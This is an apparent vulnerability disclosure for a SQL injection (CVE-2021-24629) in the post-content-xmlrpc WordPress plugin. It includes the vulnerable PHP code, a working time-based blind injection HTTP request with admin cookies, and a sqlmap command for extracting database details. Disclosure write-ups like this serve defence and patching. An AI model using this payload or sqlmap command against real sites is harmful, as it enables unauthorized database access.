Plugin Details
Plugin Name: wp-plugin : post-content-xmlrpc
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24629
Identified by : Shreya Pohekar
Disclosure Timeline
-
June 15, 2021: Issue Identified and Disclosed to WPScan
- June 21, 2021 : Plugin Closed
- August 13, 2021 : CVE Assigned
- October 7, 2021 : Public Disclosure
Technical Details
The edit site functionality takes in GET parameter id that is inserted into the SQL statement without proper sanitization, escaping or validation therefore leading to SQL Injection.
Vulnerable Code: list_sites.php#L103
101: $id=$_GET['id'];
102: $table=$wpdb->prefix."pcx";
103: $results_edit=$wpdb->get_row("SELECT * FROM ".$table." WHERE id = ".$id)
PoC Screenshot
Exploit
GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 AND (SELECT 7953 FROM (SELECT(SLEEP(5)))AgUn) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=pcx_add_sites
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1
SQLMap Command
sqlmap -r post-content-xmlrpc.req --dbms mysql --current-user --current-db -b -p id --batch --flush-session